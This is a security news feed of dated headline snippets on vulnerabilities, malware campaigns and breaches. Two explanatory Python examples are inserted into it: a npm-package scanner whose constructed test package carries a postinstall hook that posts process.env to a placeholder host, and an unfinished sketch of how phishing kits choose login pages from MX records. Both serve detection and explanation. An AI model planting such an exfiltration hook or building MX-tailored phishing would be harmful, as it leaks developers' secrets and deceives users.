Ivanti has disclosed details of a now-patched critical security vulnerability impacting its Connect Secure that has come under active exploitation in the wild. The vulnerability, tracked as CVE-2025-22457 (CVSS score: 9.0), concerns a case of a stack-based buffer overflow that could be exploited to execute arbitrary code on affected systems. "A stack-based buffer overflow in Ivanti Connect
Published: 2025-04-04T11:37:00
The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that no less than three cyber attacks were recorded against state administration bodies and critical infrastructure facilities in the country with an aim to steal sensitive data. The campaign, the agency said, involved the use of compromised email accounts to send phishing messages containing links pointing to legitimate
Published: 2025-04-04T10:24:00
A maximum severity security vulnerability has been disclosed in Apache Parquet's Java Library that, if successfully exploited, could allow a remote attacker to execute arbitrary code on susceptible instances. Apache Parquet is a free and open-source columnar data file format that's designed for efficient data processing and retrieval, providing support for complex data, high-performance
Published: 2025-04-04T09:08:00
Law enforcement facing huge gap in 'AI adoption' The National Crime Agency (NCA) will "closely examine" the recommendations made by the Alan Turing Institute after it claimed the UK was ill-equipped to tackle AI-enabled crime.
Published: 2025-04-04T08:30:07
39 Million Secrets Leaked on GitHub in 2024 GitHub found 39M secrets leaked in 2024 and launched new tools to help developers and organizations secure sensitive data in code. Microsoft-owned code hosting platform GitHub announced the discovery of 39 million secrets leaked in 2024. The exposure of this sensitive information poses a serious risk to […]
Published: 2025-04-04T06:48:25
We're not Putin up with this alleged industrial espionage, say the Dutch A Russian national appeared in a Netherlands court on Thursday accused of industrial espionage against ASML, the world's leading manufacturer of chip factory equipment and a key supplier that helps the likes of TSMC pump out top-drawer processors.
Published: 2025-04-04T06:36:14
Australians checking their pensions are melting down call centres and websites Australian retirement fund operators are scrambling after reports emerged of unauthorized access to customer accounts leading to theft of cash.
Published: 2025-04-04T05:48:18
Classification compliance? Records retention requirements? How quaint A US Department of Defense watchdog has opened an investigation into its own Secretary of Defense, Pete Hegseth, over his use of instant-messaging app Signal to discuss government business.
Published: 2025-04-04T00:36:51
Microsoft is warning of several phishing campaigns that are leveraging tax-related themes to deploy malware and steal credentials. "These campaigns notably use redirection methods such as URL shorteners and QR codes contained in malicious attachments and abuse legitimate services like file-hosting services and business profile pages to avoid detection," Microsoft said in a report shared with The
Published: 2025-04-03T23:09:00
Shape shifting technique described as menace to national security The US govt's Cybersecurity Infrastructure Agency, aka CISA, on Thursday urged organizations, internet service providers, and security firms to strengthen defenses against so-called fast flux attacks.
Published: 2025-04-03T22:54:15
Ivanti addressed a critical remote code execution flaw in Connect Secure, which has been exploited since at least mid-March 2025. Ivanti released security updates to address a critical Connect Secure remote code execution vulnerability tracked as CVE-2025-22457. The vulnerability has been exploited by a China-linked threat actor since at least mid-March 2025. Ivanti did not disclose […]
Published: 2025-04-03T19:37:57
Simple denial-of-service blunder turned out to be remote unauth code exec disaster Suspected Chinese government spies have been exploiting a newly disclosed critical bug in Ivanti VPN appliances since mid-March. This is now at least the third time in three years these snoops have been pwning these products.
Published: 2025-04-03T19:14:30
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
Published: 2025-04-03T17:52:00
The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to data theft and extortion-only attacks. [...]
Published: 2025-04-03T17:06:10
The rules have changed. Again. Artificial intelligence is bringing powerful new tools to businesses. But it's also giving cybercriminals smarter ways to attack. They’re moving quicker, targeting more precisely, and slipping past old defenses without being noticed. And here's the harsh truth: If your security strategy hasn’t evolved with AI in mind, you’re already behind. But you’re not alone and
Published: 2025-04-03T16:55:00
AI holds the promise to revolutionize all sectors of enterprise from fraud detection and content personalization to customer service and security operations. Yet, despite its potential, implementation often stalls behind a wall of security, legal, and compliance hurdles. Imagine this all-too-familiar scenario: A CISO wants to deploy an AI-driven SOC to handle the overwhelming volume of security
Published: 2025-04-03T16:04:00
CISA, the FBI, the NSA, and international cybersecurity agencies are calling on organizations and DNS providers to mitigate the "Fast Flux" cybercrime evasion technique used by state-sponsored threat actors and ransomware gangs. [...]
Published: 2025-04-03T15:37:59
It's going to happen to you one day, so get your ducks in a row As Benjamin Franklin famously said: "An ounce of prevention is worth a pound of cure," and that's especially true when it comes to disaster recovery.
Published: 2025-04-03T15:01:08
An international law enforcement operation shuts down Kidflix, a child sexual abuse material (CSAM) streaming platform with 1.8M users. An international operation, codenamed Operation Stream, against child sexual exploitation shuts down one of the largest streaming platforms that offered child sexual abuse material (CSAM) in the world, Kidflix. The investigation was led by the State […]
Published: 2025-04-03T14:22:23
Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 a
Published: 2025-04-03T14:00:00
Cybersecurity researchers have disclosed details of a new vulnerability impacting Google's Quick Share data transfer utility for Windows that could be exploited to achieve a denial-of-service (DoS) or send arbitrary files to a target's device without their approval. The flaw, tracked as CVE-2024-10668 (CVSS score: 5.9), is a bypass for two of the 10 shortcomings that were originally disclosed by
Published: 2025-04-03T13:51:00
Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025. [...]
Published: 2025-04-03T13:43:34
Counterfeit versions of popular smartphone models that are sold at reduced prices have been found to be preloaded with a modified version of an Android malware called Triada. "More than 2,600 users in different countries have encountered the new version of Triada, the majority in Russia," Kaspersky said in a report. The infections were recorded between March 13 and 27, 2025. Triada is the
Published: 2025-04-03T13:04:00
Espionage? Botnets? Trying to exploit a zero-day? Updated Someone or something is probing devices made by Juniper Networks and Palo Alto Networks, and researchers think it could be evidence of espionage attempts, attempts to build a botnet, or an effort to exploit zero-day vulnerabilities.
Published: 2025-04-03T12:43:08
The State Bar of Texas is warning it suffered a data breach after the INC ransomware gang claimed to have breached the organization and began leaking samples of stolen data. [...]
Published: 2025-04-03T11:43:17
Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a "legacy environment" last used in 2017. [...]
Published: 2025-04-03T11:26:45
ProtectEU plan wants to have its cake and eat it too The EU has shared its plans to ostensibly keep the continent's denizens secure and among the pages of bureaucratese are a few worrying sections that indicate the political union wants to backdoor encryption by 2026, or even sooner.
Published: 2025-04-03T11:17:46
Threat hunters are warning of a sophisticated web skimmer campaign that leverages a legacy application programming interface (API) from payment processor Stripe to validate stolen payment information prior to exfiltration. "This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect," Jscrambler researchers Pedro
Published: 2025-04-03T10:15:00
Recovery's never been harder in today's tangled, outsourced infrastructure Comment Disaster recovery is getting tougher as IT estates sprawl across on-prem gear, public cloud, SaaS, and third-party ITaaS providers. And it's not floods or fires causing most outages anymore - ransomware now leads the pack, taking down systems faster than any natural disaster.
Published: 2025-04-03T09:31:09
In one of the largest coordinated law enforcement operations, authorities have dismantled Kidflix, a streaming platform that offered child sexual abuse material (CSAM). "A total of 1.8 million users worldwide logged on to the platform between April 2022 and March 2025," Europol said in a statement. "On March 11, 2025, the server, which contained around 72,000 videos at the time, was seized by
Published: 2025-04-03T09:28:00
Stamp it out: Infostealer malware at German outfit may be culprit Britain's Royal Mail is investigating after a crew calling itself GHNA claimed it has put 144GB of the delivery giant's data up for sale, perhaps after acquiring it with the same stolen credentials it used to crack Samsung Germany.
Published: 2025-04-03T06:27:14
A new Triada trojan variant comes preinstalled on Android devices, stealing data on setup, warn researchers from Kaspersky. Kaspersky researchers discovered a new Triada trojan variant preinstalled on thousands of Android devices, enabling data theft upon setup. Kaspersky detected 2,600+ infections in Russia from March 13-27, 2025. The malware was discovered on counterfeit Android devices mimicking […]
Published: 2025-04-03T05:16:20
Double-oh-sh... The name's not Bond. It's O'Brien - Keith O'Brien, now-former global payroll compliance manager at the Dublin, Ireland office of HR software-as-a-service maker Rippling.
Published: 2025-04-02T21:56:22
FIN7 cybercrime group has been linked to Anubis, a Python-based backdoor that provides remote access to compromised Windows systems. The threat actor FIN7, also known as Savage Ladybug, has developed a new Python-based malware, named Anubis Backdoor, which allows attackers to gain full remote control over infected Windows systems. It executes shell commands and system […]
Published: 2025-04-02T21:38:24
Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have allowed a malicious actor to access container images and even inject malicious code. "The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact
Published: 2025-04-02T19:18:00
Bosses say theft now the name of the game with a shift in tactics, apparent branding Big-game ransomware crew Hunters International says its criminal undertaking has become "unpromising, low-converting, and extremely risky," and it is mulling shifting tactics amid an apparent rebrand.
Published: 2025-04-02T19:09:49
A lawyer for Xiaofeng Wang and his wife says they are “safe” after FBI searches of their homes and Wang’s sudden dismissal from Indiana University, where he taught for over 20 years.
Published: 2025-04-02T17:31:26
Introduction As the cybersecurity landscape evolves, service providers play an increasingly vital role in safeguarding sensitive data and maintaining compliance with industry regulations. The National Institute of Standards and Technology (NIST) offers a comprehensive set of frameworks that provide a clear path to achieving robust cybersecurity practices. For service providers, adhering to NIST
Published: 2025-04-02T16:55:00
Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with weak credentials. "Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis
Published: 2025-04-02T16:13:00
When assessing an organization’s external attack surface, encryption-related issues (especially SSL misconfigurations) receive special attention. Why? Their widespread use, configuration complexity, and visibility to attackers as well as users make them more likely to be exploited. This highlights how important your SSL configurations are in maintaining your web application security and
Published: 2025-04-02T15:30:00
Fallout shows how what you say must be central to disaster planning Opinion Oracle is being accused of poor incident comms as it reels from two reported data security mishaps over the past fortnight, amid a reluctance to publicly acknowledge all of the events as well as allegedly deleting evidence from the web.
Published: 2025-04-02T14:54:11
Learn how Infinidat's enterprise cyber storage solutions can enable near-immediate recovery Sponsored Post It's not a question of if your organization gets hit by a cyberattack - only when, and how quickly it recovers.
Published: 2025-04-02T14:46:11
Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. [...]
Published: 2025-04-02T14:24:54
Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. [...]
Published: 2025-04-02T14:02:31
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-24813, to its Known Exploited Vulnerabilities (KEV) catalog. The Apache Tomcat vulnerability CVE-2025-24813 was recently disclosed and is being actively exploited just 30 […]
Published: 2025-04-02T13:47:39
The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan of the same name) that can grant them remote access to compromised Windows systems. "This malware allows attackers to execute remote shell commands and other system operations, giving them full control over an infected machine," Swiss
Published: 2025-04-02T12:22:00
Organizational, technological resilience combined defeat the disease that is cybercrime When IT disasters strike, it can become a matter of life and death for healthcare organizations and criminals know it.
Published: 2025-04-02T11:36:11
Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new module that implements call stack spoofing to hide the origin of function calls (e.g., API and system calls)," Zscaler ThreatLabz researcher Muhammed Irfan V A said in
Published: 2025-04-02T11:25:00
Victims expect to spend considerable time and money over privacy incident, lawyers argue Specialist class action lawyers have launched proceedings against Oracle in Texas over two alleged data breaches.
Published: 2025-04-02T10:54:19
Tip-lipped for 30 years before becoming an 'unrivaled advocate' for the site Obit Betty Webb MBE, one of the team who worked at the code-breaking Bletchley Park facility in England during the Second World War, has died at the age of 101.
Published: 2025-04-02T09:36:49
Apple backports three critical vulnerabilities actively exploited in attacks against older iOS and macOS models. Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions. The three vulnerabilities are: Apple released the following updates: that are available for the following devices:
Published: 2025-04-02T08:52:53
Hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks. Researchers at threat intelligence firm GreyNoise warn that hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely in preparation for targeted attacks. GreyNoise reports that over 24,000 unique IP addresses […]
Published: 2025-04-02T07:29:05
Cupertino already squashed 'em in more recent releases - which this week get a fresh round of fixes Apple has delivered a big batch of OS updates, some of which belatedly patch older versions of its operating systems to address exploited-in-the-wild flaws the iGiant earlier fixed in more recent releases.
Published: 2025-04-02T06:13:09
With help from UK operatives, because it's getting tougher to run the scam in the USA North Korea's scamming, thieving, and AI-abusing fake IT workers are increasingly targeting European employers.
Published: 2025-04-02T05:58:08
But his emails! Sharing them with Google! Senior members of the US National Security Council, including the White House national security adviser Michael Waltz, have been accused of using their personal Gmail accounts to exchange sensitive information.
Published: 2025-04-02T01:36:09
Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as
Published: 2025-04-01T22:38:00
On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox
Published: 2025-04-01T21:04:00
A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,
Published: 2025-04-01T19:48:00
Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed sensitive military positions and powerful weapons systems relating to an ongoing conflict, using his personal Gmail account. Waltz, along with other members of […]
Published: 2025-04-01T18:59:13
Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers. Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers. The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]
Published: 2025-04-01T18:32:12
Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate
Published: 2025-04-01T16:58:00
Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. "This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation," threat
Published: 2025-04-01T16:47:00
Explore how relying on CSRF tokens as a security measure against CSRF attacks is a recommended best practice, but in some cases, they are simply not enough. Introduction As per the Open Web Application Security Project (OWASP), CSRF vulnerabilities are recognized as a significant threat and are historically part of their top risks. The implications of CSRF attacks are far-reaching and could
Published: 2025-04-01T16:33:00
Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. "The first sighting of its activity was in the second quarter of 2023; back then, it was
Published: 2025-04-01T16:33:00
Copilot told us that half a century is 25 years. It feels much longer Microsoft will officially hit the half-century mark on Friday as the Windows giant turns 50 years old. What do you consider the highs and lows of the company's journey to dominance?
Published: 2025-04-01T15:32:08
Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]
Published: 2025-04-01T14:09:54
The UK government must be thrilled Google will soon offer end-to-end encrypted (E2EE) email for all users, even those who do not use Google Workspace, and says it'll do so without imposing any undue stress on IT admins.
Published: 2025-04-01T13:00:13
Tech secretary reveals landmark legislation's full details for first time The UK's technology secretary revealed the full breadth of the government's Cyber Security and Resilience (CSR) Bill for the first time this morning, pledging £100,000 ($129,000) daily fines for failing to act against specific threats under consideration.
Published: 2025-04-01T11:37:23
Apple has been hit with a fine of €150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorité de la concurrence said it's imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,
Published: 2025-04-01T11:17:00
Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it's developed a new encryption model that, unlike the current encryption feature on Gmail, doesn't require senders or recipients to use custom software or exchange encryption certificates. The feature is rolling out in […]
Published: 2025-04-01T09:00:00
Not exactly Snowden levels of skill A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.
Published: 2025-04-01T08:51:54
Resurge an apt name for malware targeting hardware maker that has security bug after security bug Owners of Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products have a new strain of malware to fend off, according to the US Cybersecurity and Infrastructure Security Agency, aka CISA.
Published: 2025-04-01T01:09:08
Indiana Uni rm -rf online profiles while agents haul boxes of evidence Updated A tenured computer security professor at Indiana University and his university-employed wife have not been seen publicly since federal agents raided their homes late last week.
Published: 2025-03-31T23:16:39
The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of
Published: 2025-03-31T22:11:00
1990s incident response in 2025 Two Oracle data security breaches have been reported in the past week, and the database goliath not only remains reluctant to acknowledge the disasters publicly it may be scrubbing the web of evidence, too.
Published: 2025-03-31T21:30:00
Xiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school's website were wiped ahead of recent FBI raids.
Published: 2025-03-31T19:42:00
Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
Published: 2025-03-31T17:34:00
Every week, someone somewhere slips up and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights and the unexpected
Published: 2025-03-31T16:55:00
Explanation leaves a 'lot of questions unanswered,' says infosec researcher A digital burglar is claiming to have nabbed a trove of "highly sensitive" data from Check Point - something the American-Israeli security biz claims is a huge exaggeration.
Published: 2025-03-31T16:35:09
If you're using AWS, it's easy to assume your cloud security is handled - but that's a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it's up to the customer to handle the locks, install the alarm systems,
Published: 2025-03-31T16:30:00
Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to
Published: 2025-03-31T15:00:00
Think AWS has security covered? Think again. Discover real-world examples of what it doesn't secure and how to protect your environment Partner Content AWS customers might assume that security is taken care of for them - however, this is a dangerous misconception.
Published: 2025-03-31T10:00:09
An unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images some of which are likely illegal. The company deleted its websites after WIRED reached out.
Published: 2025-03-31T10:00:00
PLUS: Indonesia crimps social media, allows iPhones; India claims rocket boost; In-flight GenAI for Japan Airlines Asia In Brief China last week commenced a crackdown on inappropriate collection and subsequent use of personal information.
Published: 2025-03-31T00:30:14
PLUS: OpenAI bumps bug bounties bigtime; INTERPOL arrests 300 alleged cyber-scammers; And more! Infosec in brief Oracle Health appears to have fallen victim to an info stealing attack that has led to patient data stored by American hospitals being plundered.
Published: 2025-03-30T22:45:12
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that
Published: 2025-03-30T10:37:00
A safe and proper rewrite should take years not months. The so-called Department of Government Efficiency (DOGE) is starting to put together a team to migrate the Social Security Administration’s (SSA) computer
Published: 2025-03-29T14:08:49
Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"
Published: 2025-03-29T12:58:00
Miscreants warming to Delphi, Haskell, and the like to evade detection Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.
Published: 2025-03-29T10:50:05
Plus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.
Published: 2025-03-29T10:30:00
In what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract
Published: 2025-03-29T09:22:00
Alleged breaches affect Oracle Cloud and Oracle Health. Oracle isn’t commenting on recent reports that it has experienced two separate data breaches that have exposed sensitive personal information belonging to
Published: 2025-03-28T19:41:14
Cybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids. The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. "The new vulnerabilities can
Published: 2025-03-28T18:51:00
Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader. "The purpose of the malware is to download and execute second-stage payloads while evading
Published: 2025-03-28T17:27:00
Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is
Published: 2025-03-28T15:45:00
An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first
Published: 2025-03-28T13:36:00
A concert on Monday night at New York's Radio City Music Hall was a special occasion for Frank Miller: his parents' wedding anniversary. He didn't end up seeing the show, and before he could even get past security, he was informed that he was in fac
Published: 2025-03-28T13:10:41
Department director admits Welsh capital's council still trying to get heads around threat of dark web leaks Cardiff City Council's director of children's services says data was leaked or stolen from the organization, although she did not clarify how or what was pilfered.
Published: 2025-03-28T12:28:14
Similar issue in Windows 11 resolved as of Wednesday Microsoft is warning that a faulty patch pushed out in February is causing Windows Server 2025 Remote Desktop sessions to freeze under certain circumstances.
Published: 2025-03-28T11:37:06
Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. "Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers," Sonatype researcher Ax Sharma said. "However, [...] the latest
Published: 2025-03-28T11:36:00
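The hijacked packages above are reported to read environment variables from the host and send them out. The following is an added example, not Sonatype's or npm's own tooling: a heuristic scan of one unpacked npm package that flags install-time lifecycle hooks and any JavaScript file that both reads process.env and makes outbound network calls. The sample package, its name, and the collector host name are constructed here; the regexes are a starting point for triage, not a complete detector.

```python
"""Heuristic scan of an installed npm package for the pattern behind the
hijacked crypto packages: code that reads process.env and also reaches out
to the network, or that is wired into an install-time lifecycle hook.
The sample package is constructed for demonstration; the regexes are a
triage heuristic, not a complete detector."""
import json
import os
import re
import tempfile

# Reading environment variables is normal; reading them in the same file
# that makes outbound requests is the combination worth a human look.
ENV_READ = re.compile(r"process\.env\b")
NET_CALL = re.compile(
    r"\b(?:https?\.(?:request|get)|fetch|axios|XMLHttpRequest|net\.connect|"
    r"dns\.(?:resolve|lookup))\b"
)
# Scripts npm runs automatically on install; a hijacked package that adds one
# gets code execution on every developer machine and CI runner that installs it.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_package(pkg_dir):
    """Return a list of human-readable findings for one unpacked package."""
    findings = []
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    for hook in LIFECYCLE_HOOKS:
        command = manifest.get("scripts", {}).get(hook)
        if command:
            findings.append(f"lifecycle hook '{hook}' runs: {command}")
    for root, _dirs, files in os.walk(pkg_dir):
        if "node_modules" in root.split(os.sep):
            continue  # nested dependencies are scanned as their own packages
        for name in files:
            if not name.endswith((".js", ".cjs", ".mjs")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if ENV_READ.search(src) and NET_CALL.search(src):
                rel = os.path.relpath(path, pkg_dir)
                findings.append(f"{rel}: reads process.env and makes outbound network calls")
    return findings


def build_sample_package(hijacked):
    """Write a constructed package to a temp dir and return its path.
    With hijacked=True it mimics a legitimate library that gained an
    exfiltration file and a postinstall hook; package and host names are made up."""
    pkg_dir = tempfile.mkdtemp(prefix="npm-sample-")
    manifest = {"name": "example-chain-sdk", "version": "1.4.2", "main": "index.js"}
    files = {
        "index.js": "module.exports = { toWei: (n) => BigInt(n) * 10n ** 18n };\n",
    }
    if hijacked:
        manifest["scripts"] = {"postinstall": "node lib/telemetry.js"}
        files["lib/telemetry.js"] = (
            "const https = require('https');\n"
            "const body = JSON.stringify(process.env);\n"
            "const req = https.request({hostname: 'collector.invalid', method: 'POST'});\n"
            "req.end(body);\n"
        )
    with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    for rel, src in files.items():
        full = os.path.join(pkg_dir, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(src)
    return pkg_dir


if __name__ == "__main__":
    for flag in (False, True):
        print("hijacked" if flag else "clean", scan_package(build_sample_package(flag)))
```

Run it against a real package by pointing scan_package at a directory under node_modules. A clean package returns no findings; a package that only reads process.env (common for configuration) is not flagged unless the same file also contains a network call, which keeps the noise down at the cost of missing code that splits the two across files.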
Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape (
Published: 2025-03-28T11:14:00
Hacking LLMs has always been more art than science. A new attack on Gemini could change that. In the growing canon of AI security, the indirect prompt injection has emerged as the most powerful means for attacke
Published: 2025-03-28T11:00:58
Single click on a phishing link in Google browser blew up sandbox on Windows Google pushed out an emergency patch for Chrome on Windows this week to stop attackers exploiting a sandbox-breaking zero-day vulnerability, seemingly used by snoops to target certain folks in Russia.
Published: 2025-03-28T06:34:11
WOW! DID! SOMEONE! REALLY! STEAL! DATA! ON! 400K! USERS?! A cyber-crime ring calling itself Arkana has made a cringe music video to boast of an alleged theft of subscriber account data from Colorado-based cableco WideOpenWest (literally, WOW!)
Published: 2025-03-28T01:17:11
Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind
Published: 2025-03-27T22:28:00
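The mechanism the report describes is DNS-driven template selection: the kit looks up the MX records of the victim's e-mail domain, infers the mail provider from the exchange host names, and serves a matching login page. The following is an added example written for this page, not Infoblox's analysis code or the kit itself. The DNS resolver is injected so the code runs offline on constructed MX records; a live resolver would call dnspython's dns.resolver.resolve(domain, "MX"). The suffix table is a short sample of well-known provider MX patterns and the domains are examples, not the 114-brand list the kit is reported to carry. Run against your own domain, it shows which template your users would be served.

```python
"""Mechanism behind MX-driven phishing kits: resolve the MX records of the
victim's mail domain and use the provider they reveal to pick the login page
the victim expects. The resolver is injected so this runs offline on
constructed records; the suffix table is a short sample, not the kit's list."""

# MX host-name suffixes that identify the hosting provider (sample only).
PROVIDER_BY_MX_SUFFIX = {
    ".mail.protection.outlook.com": "Microsoft 365",
    ".google.com": "Google Workspace",
    ".googlemail.com": "Google Workspace",
    ".yahoodns.net": "Yahoo Mail",
    ".zoho.com": "Zoho Mail",
    ".pphosted.com": "Proofpoint-fronted (provider hidden)",
}
GENERIC_TEMPLATE = "generic webmail"

# Constructed MX answers as (preference, exchange) pairs; domains are examples.
SAMPLE_MX = {
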